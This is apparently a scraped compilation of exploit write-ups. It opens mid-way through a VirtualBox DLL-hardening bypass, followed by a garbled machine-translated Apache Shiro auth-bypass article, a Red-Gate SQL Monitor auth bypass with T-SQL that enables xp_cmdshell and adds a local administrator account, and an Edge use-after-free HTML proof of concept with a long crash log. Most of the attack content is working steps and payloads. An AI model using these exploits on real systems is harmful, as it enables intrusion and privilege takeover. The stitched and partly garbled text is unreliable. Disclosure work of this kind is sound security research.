3. Add current user COM redirection to point VBOX class to the original UNC path.
4. Run VirtualBox. The hardening code will read the UNC path and find it's a valid file, however when the kernel maps the image section in NtMapViewOfSection it will find it's already got a mapped image loaded and will use that instead, the mapped image is of course the untrusted DLL, not the one the hardening code checked.
5. The untrusted DLL will be loaded into memory and executed.

This is easy enough using a remote server but it would be more useful to exploit locally. For that we can use the default admin shares on a Windows system which expose the drives over SMB. Even though their primary purpose is for administration you don't need to be an administrator if you access them locally, you'll just get access just a the same user account. So we can do the redirection of the file access as follows:

1. Set up a path such as c:\poc somewhere on an NTFS drive and copy the untrusted DLL to that directory called vboxc.dll.
2. Create a mount point (a directory symlink) at c:\poc\dummy which redirects to c:\poc.
3. Map \\localhost\c$\poc\dummy\vboxc.dll. The SMB server will follow the mount point and open c:\poc\vboxc.dll, however from the client perspective (even though we're on the same machine) the file still thinks the original UNC path.
4. Change the mount point to c:\program files\oracle\virtualbox.  Now when accessing the UNC path the file opened will be the real vboxc.dll file which is signed and has a trusted owner.

The main reason this works is the fact that from a client perspective the filename never changes therefore the hardening code can't do much about it. The only way to tell the mapped file doesn't match the original would be to check the acual mapped image data as requesting its path using the memory manager would just return the UNC path. Ultimately I guess you probably shouldn't be trusting code on UNC paths.
 
Proof of Concept:

I’ve provided a PoC which will abuse the VBox COM Client loading process in source form.
 
Prerequisites: 
Compile the supplied project in release mode using VS2015. I've only provided x64 version, it should work on x86 but I've not got anything to test it on. Then follow these steps:
 
1) Create the directory c:\poc and copy RunPoc.exe, NtApiDotNet.dll and the fake vboxc.dll to that directory.
2) Execute RunPoc.exe, it should print that it's successfully loaded the file. At this point DO NOT close the RunPoc executable as the file needs to stay mapped.
3) Start a VM. Each process the DLL is injected into will show a message box. This will include the protected VirtualBox.exe process.
4) When done testing hit enter in the RunPoc executable to ensure the keys get deleted.

Expected Result:
Untrusted DLL loading should fail inside a protected process.

Observed Result:
DLL is loaded into the protected process.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42426.zip
HireHackking

0x00脆弱性簡単な説明

1.5.3より前のApache Shiroの

0x01脆弱性の影響

Spring Dynamic Controllerを使用してApache Shiroを使用すると、慎重にコンパイルされた要求が認証のバイパスにつながる可能性があります。直接アクセス/shiro/admin/pageの場合、302ジャンプを返してログインします。アクセス/;/shiro/admin/ページでは、1.5.3より前に/管理ルート

0x02環境構築

Apache ShiroでShiroの許可を直接バイパスしてアクセスできます。 Spring Frameworkでは、Shiro認証のみが使用されます。 1.プロジェクトをローカルhttps://github.com/l3yx/springboot-shiro2にダウンロードします。 Idea Editorを介してWarパッケージにコンパイルし、Tomcatの下のWebAppsディレクトリに入れて実行します。戦争パッケージはここにまとめられています:https://github.com/backlion/demo/blob/master/shiro.war

0x03脆弱性の再発

1。許可構成は次のとおりです。

shirofilterfactorybean shirofilterfactorybean(){

shirofilterfactorybean bean=new shirofilterfactorybean();

bean.setsecuritymanager(securitymanager());

bean.setloginurl( '/login');

bean.setsuccessurl( '/index');

bean.setunauthorizedurl( '/unauthorizedurl');

mapstring、string map=new linkedhashmap();

map.put( '/dologin'、 'anon');

map.put( '/admin/*'、 'authc');

bean.setFilterChainDefinitionMap(Map);

豆を返します。

}

---

@getMapping( '/admin/page')

public string admin(){

「管理者ページ」を返します。

} 2.Mavenパッケージプロジェクトはshiro.warであり、Tomcatに展開されています。この脆弱性はうまく活用されています。アプリケーションがルートディレクトリにルートディレクトリを展開できない2つの条件があります。つまり、コンテキストパスが必要です、server.servlet.context-path=/shiro。ルートディレクトリの場合、コンテキストパスは空で、URLはCVE-2020-1957のパッチによってフォーマットされます。 Shiroバージョンが1.5.2未満の場合、この条件は必要ないことは注目に値します。 Spring Controller 3に他の許可確認コードはありません3。直接アクセス/Shiro/Admin/ページの場合、302ジャンプを返し、ログイン1049983-20201129040357293-1694396647.png4が必要になります。ただし、/;/shiro/admin/ページにアクセスした場合、Shiroの許可検証を直接バイパスして、/adminルート1049983-20201129040357781-2061064872.png

0x04脆弱性分析

の情報にアクセスできます。Shiroの許可確認は、URLマッチを審査することでURLマッチを審査することで行われます。バイパス。 ShiroでのURLの取得とマッチングは、org.apache.shiro.web.filter.mgt.pathmatchingfilterchainresolver#getChainで取得されます。 getpathwithinapplication関数を介して得られたパスは/1049983-20201129040358346-1396394566.jpg関数org.apache.shiro.web.util.webutilsの処理ロジックに従います#getpathwithinApplication 1049983-20201129040358965-2085604693.jpg org.apache.shiro.web.util.webutils#webtils#web.util.webutilsを見ることができます。1049983-20201129040358965-2085604693.jpg org.apache.shiro.web.util.webutils#getRequesturi gets/1049983-20201129040359608-834110665.jpgここでは、getContextPath()getSpathinfo()getPathInfo()をget //渡された後、decodeandcleanuristringは /、org.apache.shiro.web.util.webutils#decodeandcleanuristring 1049983-20201129040400208-1547024258.jpgになります。リクエストリクエストはspringに入ります。スプリング処理URL関数は、org.springframework.web.util.urlpathhelper#getPathWithInservletMapping 1049983-20201129040400772-1364188888.jpg 1049983-20201129040401248-1065967938.png GetPathWithInApplicationプロセスの下で、コンテキストパスとルートを正しく取得できます。最後に、getPathWithInServletMapping関数がフォーマットされた後、最終パスは /admin /ページであるため、正常にページにアクセスできます。1049983-20201129040401715-1588254651.pngしたがって、要約すると、URLがTomcat、Tomcat Judges/; Shiro/Admin/Pageに入ると、Shiroアプリケーションの下の/管理者/ページルートであり、Shiroアプリケーションの下の/管理/ページルートです。シロに入ると、それは /と見なされます。 Springに入ると、テストアプリケーションの下で /管理/ページルートとして正しく処理され、最終的にはShiroの許可バイパスにつながります。

0x05脆弱性修正

最新バージョンにアップグレードされた、オフィシャルは新しいバージョンの脆弱性を修正しました

0x06参照

https://L33333333333333333333333333333330/30/30/30/20%90%90%90%87%87%E6%BC%8F%E6%B4%

https://xz.aliyun.com/t/8223

HireHackking 
# Exploit Title: Red-Gate SQL Monitor authentication bypass
# Version: Redgate SQL Monitor before 3.10 and 4.x before 4.2
# Date: 2017-08-10
# Red-Gate made a security announcement and publicly released the fixed version more than two years before this exploit was published
# Vendor Advisory: http://www.red-gate.com/products/dba/sql-monitor/entrypage/security-vulnerability
# Software Link: ftp://support.red-gate.com/patches/SqlMonitorWeb/09Apr2015/SQLMonitorWeb.exe
# Exploit Author: Paul Taylor / Foregenix Ltd
# Website: http://www.foregenix.com/blog
# Tested on: SQLMonitor 4.1.2.404, SQLMonitor 4.1.0.2226
# CVE: CVE-2015-9098

1. Description

A remote attacker can gain unauthenticated access to the Base Monitor, resulting in the ability to execute arbitrary SQL commands on any monitored Microsoft SQL Server machines. If the Base Monitor is connecting to these machines using an account with SQL admin privileges, then code execution on the operating system can result in full system compromise (if Microsoft SQL Server is running with local administrator privileges).

2. Proof of Concept

Fingerprint the Red-Gate SQL monitor version on the target machine, by examining the web page source code on the log in page. E.g. "/static/4.1.0.2226/Content/RedGate.Response.css" implies version 4.1.0.2226.

Download and install the corresponding version of SQL monitor on a test VM. Microsoft SQL Express can be used to get base monitor to work properly, and test out the functionality. Connect the SQL monitor and base monitor together on your test VM machine and log in.

Then browse to "Configuration / Base Monitor connection" and update the Base Monitor computer details to a different Base Monitor IP address and Port number (on the target or victim machine). Click "Change connection". Now you will be connecting to the target Base Monitor without authentication, but with full privileges.

Use Configuration / Custom-metrics / Create, and then provide a Metric name and Description, and enter a T-SQL query. If Base Monitor is running with SQL admin rights, and MS SQL is running with Windows administrator rights, then the following will work:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE with override;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE with override;
EXEC xp_cmdshell 'net user testuser MyLongPassword_1 /add'
EXEC xp_cmdshell 'net localgroup administrators testuser /add'

Select a SQL server instance (or all instances), and then select "Specify databases" and type: master
Click "Test metric collection."
In the popup dialog, ensure the desired instances are ticked, and then click "Test metric collection".

This will execute your SQL query with the rights of the Base Monitor SQL user, and any xp_cmdshell with the rights of the service account in use by MSSQL.

The return value will contain an error, because the result is not an integer, but you should be able to see some of the xp_cmdshell command response in the error, e.g. "Unable to convert.... The command completed successfully"

3. Solution:
   
Update to latest version of Red-Gate SQL monitor
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1255

There is a use-after free vulnerability in Microsoft Edge that can lead to memory disclosure. The vulnerability has been confirmed on Windows 10 Enterprise 64-bit (OS version 1607, OS build 14393.1198), Microsoft Edge 38.14393.1066.0, Microsoft EdgeHTML 14.14393.

PoC:

==========================================
-->

<!-- saved from url=(0014)about:internet -->
<script>
var n = 0;
function go() {
  document.addEventListener("DOMNodeRemoved", eventhandler);
  eventhandler();
}
function eventhandler() {
  n++; if(n==5) return; //prevent going into an infinite recursion
  t.defaultValue = "aaaaaaaaaaaaaaaaaaaa";
  f.reset();
}
</script>
<body onload=go()>
<form id="f">
<textarea id="t">aaa</textarea>

<!--
=========================================

This seems to be the same bug as https://bugs.chromium.org/p/project-zero/issues/detail?id=1076 only that one is in IE and this one is in Edge.

I don't have symbols for the latest Edge after May update, so crash log doesn't make much sense but here it is anyway:

=========================================

(1618.1258): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\SYSTEM32\edgehtml.dll - 
edgehtml!Ordinal125+0x6446c:
00007ffe`843d615c 6641393e        cmp     word ptr [r14],di ds:000001fa`3389cfd4=????

0:013> !heap -p -a 000001fa`3389cfd4
    address 000001fa3389cfd4 found in
    _DPH_HEAP_ROOT @ 1f20b961000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                1fa33116138:      1fa3389c000             2000
    00007ffe9fb1b90b ntdll!RtlDebugReAllocateHeap+0x0000000000000047
    00007ffe9fadcbfe ntdll!RtlpReAllocateHeapInternal+0x000000000008729e
    00007ffe9fa55941 ntdll!RtlReAllocateHeap+0x0000000000000031
    00007ffe845cc2fa edgehtml!CreateWebDriverAdapter+0x00000000000504ba
    00007ffe845cbd74 edgehtml!CreateWebDriverAdapter+0x000000000004ff34
    00007ffe8462fbb8 edgehtml!Ordinal107+0x0000000000056a48
    00007ffe84d05143 edgehtml!Ordinal106+0x0000000000018e63
    00007ffe845ab544 edgehtml!CreateWebDriverAdapter+0x000000000002f704
    00007ffe846b0747 edgehtml!Ordinal107+0x00000000000d75d7
    00007ffe84ae5c8f edgehtml!ClearPhishingFilterData+0x00000000000beeaf
    00007ffe84792bb5 edgehtml!DllEnumClassObjects+0x0000000000043245
    00007ffe83c41227 chakra!DllGetClassObject+0x0000000000001d97
    00007ffe83c7a3d7 chakra!MemProtectHeapUnrootAndZero+0x00000000000038e7
    00007ffe83aef541 chakra!JsProjectWinRTNamespace+0x0000000000046621
    000001fa1cf7057e +0x000001fa1cf7057e

0:013> r
rax=0000000000000000 rbx=000001fa2d058a40 rcx=000001f212910000
rdx=0000004d44824f5c rsi=0000000000000000 rdi=0000000000000000
rip=00007ffe843d615c rsp=0000004d44824f10 rbp=0000004d44825010
 r8=00000000ffffffff  r9=000001f212910000 r10=00007ffe85156fd0
r11=000001f212841a90 r12=0000000000000000 r13=0000000000000014
r14=000001fa3389cfd4 r15=000001f2128e8840
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
edgehtml!Ordinal125+0x6446c:
00007ffe`843d615c 6641393e        cmp     word ptr [r14],di ds:000001fa`3389cfd4=????

0:013> k
 # Child-SP          RetAddr           Call Site
00 0000004d`44824f10 00007ffe`844bc561 edgehtml!Ordinal125+0x6446c
01 0000004d`44826190 00007ffe`8459a535 edgehtml!Ordinal105+0x13631
02 0000004d`448261e0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e6f5
03 0000004d`44826340 00007ffe`84d03e81 edgehtml!Ordinal106+0x18f9e
04 0000004d`448263c0 00007ffe`84447753 edgehtml!Ordinal106+0x17ba1
05 0000004d`448263f0 00007ffe`8453341c edgehtml!Ordinal125+0xd5a63
06 0000004d`448264e0 00007ffe`847afc55 edgehtml!GetWebPlatformObject+0xbb4c
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\SYSTEM32\chakra.dll - 
07 0000004d`44826520 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x602e5
08 0000004d`44826550 000001fa`1cf70641 chakra!DllGetClassObject+0x1d97
09 0000004d`44826630 00007ffe`83cf90a3 0x000001fa`1cf70641
0a 0000004d`448266c0 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
0b 0000004d`44826710 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
0c 0000004d`44826770 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
0d 0000004d`44826860 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
0e 0000004d`448268d0 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
0f 0000004d`44826970 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
10 0000004d`44826a00 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
11 0000004d`44826aa0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
12 0000004d`44826af0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
13 0000004d`44826b30 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
14 0000004d`44826cb0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
15 0000004d`44826d30 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
16 0000004d`44826e90 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
17 0000004d`44826ed0 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
18 0000004d`448271a0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
19 0000004d`448271f0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
1a 0000004d`44827360 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
1b 0000004d`448273a0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
1c 0000004d`448274b0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
1d 0000004d`44827610 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
1e 0000004d`44827690 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
1f 0000004d`448276c0 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
20 0000004d`448277c0 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
21 0000004d`44827800 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
22 0000004d`44827840 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
23 0000004d`44827870 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
24 0000004d`44827950 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
25 0000004d`44827a30 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
26 0000004d`44827af0 00007ffe`83cf90a3 0x000001fa`1cf7057e
27 0000004d`44827b80 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
28 0000004d`44827bd0 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
29 0000004d`44827c30 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
2a 0000004d`44827d20 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
2b 0000004d`44827d90 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
2c 0000004d`44827e30 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
2d 0000004d`44827ec0 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
2e 0000004d`44827f60 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
2f 0000004d`44827fb0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
30 0000004d`44827ff0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
31 0000004d`44828170 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
32 0000004d`448281f0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
33 0000004d`44828350 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
34 0000004d`44828390 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
35 0000004d`44828660 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
36 0000004d`448286b0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
37 0000004d`44828820 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
38 0000004d`44828860 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
39 0000004d`44828970 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
3a 0000004d`44828ad0 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
3b 0000004d`44828b50 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
3c 0000004d`44828b80 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
3d 0000004d`44828c80 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
3e 0000004d`44828cc0 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
3f 0000004d`44828d00 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
40 0000004d`44828d30 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
41 0000004d`44828e10 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
42 0000004d`44828ef0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
43 0000004d`44828fb0 00007ffe`83cf90a3 0x000001fa`1cf7057e
44 0000004d`44829040 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
45 0000004d`44829090 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
46 0000004d`448290f0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
47 0000004d`448291e0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
48 0000004d`44829250 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
49 0000004d`448292f0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
4a 0000004d`44829380 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
4b 0000004d`44829420 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
4c 0000004d`44829470 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
4d 0000004d`448294b0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
4e 0000004d`44829630 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
4f 0000004d`448296b0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
50 0000004d`44829810 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
51 0000004d`44829850 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
52 0000004d`44829b20 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
53 0000004d`44829b70 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
54 0000004d`44829ce0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
55 0000004d`44829d20 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
56 0000004d`44829e30 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
57 0000004d`44829f90 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
58 0000004d`4482a010 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
59 0000004d`4482a040 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
5a 0000004d`4482a140 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
5b 0000004d`4482a180 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
5c 0000004d`4482a1c0 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
5d 0000004d`4482a1f0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
5e 0000004d`4482a2d0 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
5f 0000004d`4482a3b0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
60 0000004d`4482a470 00007ffe`83cf90a3 0x000001fa`1cf7057e
61 0000004d`4482a500 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
62 0000004d`4482a550 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
63 0000004d`4482a5b0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
64 0000004d`4482a6a0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
65 0000004d`4482a710 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
66 0000004d`4482a7b0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
67 0000004d`4482a840 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
68 0000004d`4482a8e0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
69 0000004d`4482a930 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
6a 0000004d`4482a970 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
6b 0000004d`4482aaf0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
6c 0000004d`4482ab70 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
6d 0000004d`4482acd0 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
6e 0000004d`4482ad10 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
6f 0000004d`4482afe0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
70 0000004d`4482b030 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
71 0000004d`4482b1a0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
72 0000004d`4482b1e0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
73 0000004d`4482b2f0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
74 0000004d`4482b450 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
75 0000004d`4482b4d0 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
76 0000004d`4482b500 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
77 0000004d`4482b600 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
78 0000004d`4482b640 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
79 0000004d`4482b680 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
7a 0000004d`4482b6b0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
7b 0000004d`4482b790 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
7c 0000004d`4482b870 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
7d 0000004d`4482b930 00007ffe`83cf90a3 0x000001fa`1cf7057e
7e 0000004d`4482b9c0 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
7f 0000004d`4482ba10 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
80 0000004d`4482ba70 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
81 0000004d`4482bb60 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
82 0000004d`4482bbd0 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
83 0000004d`4482bc70 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
84 0000004d`4482bd00 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
85 0000004d`4482bda0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
86 0000004d`4482bdf0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
87 0000004d`4482be30 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
88 0000004d`4482bfb0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
89 0000004d`4482c030 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
8a 0000004d`4482c190 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
8b 0000004d`4482c1d0 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
8c 0000004d`4482c4a0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
8d 0000004d`4482c4f0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
8e 0000004d`4482c660 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
8f 0000004d`4482c6a0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
90 0000004d`4482c7b0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
91 0000004d`4482c910 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
92 0000004d`4482c990 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
93 0000004d`4482c9c0 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
94 0000004d`4482cac0 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
95 0000004d`4482cb00 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
96 0000004d`4482cb40 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
97 0000004d`4482cb70 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
98 0000004d`4482cc50 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
99 0000004d`4482cd30 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
9a 0000004d`4482cdf0 00007ffe`83cf90a3 0x000001fa`1cf7057e
9b 0000004d`4482ce80 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
9c 0000004d`4482ced0 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
9d 0000004d`4482cf30 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
9e 0000004d`4482d020 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
9f 0000004d`4482d090 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
a0 0000004d`4482d130 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
a1 0000004d`4482d1c0 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
a2 0000004d`4482d260 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
a3 0000004d`4482d2b0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
a4 0000004d`4482d2f0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
a5 0000004d`4482d470 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
a6 0000004d`4482d4f0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
a7 0000004d`4482d650 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
a8 0000004d`4482d690 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
a9 0000004d`4482d960 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
aa 0000004d`4482d9b0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
ab 0000004d`4482db20 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
ac 0000004d`4482db60 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
ad 0000004d`4482dc70 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
ae 0000004d`4482ddd0 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
af 0000004d`4482de50 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
b0 0000004d`4482de80 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
b1 0000004d`4482df80 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
b2 0000004d`4482dfc0 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
b3 0000004d`4482e000 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
b4 0000004d`4482e030 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
b5 0000004d`4482e110 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
b6 0000004d`4482e1f0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
b7 0000004d`4482e2b0 00007ffe`83cf90a3 0x000001fa`1cf7057e
b8 0000004d`4482e340 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
b9 0000004d`4482e390 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
ba 0000004d`4482e3f0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
bb 0000004d`4482e4e0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
bc 0000004d`4482e550 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
bd 0000004d`4482e5f0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
be 0000004d`4482e680 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
bf 0000004d`4482e720 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
c0 0000004d`4482e770 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
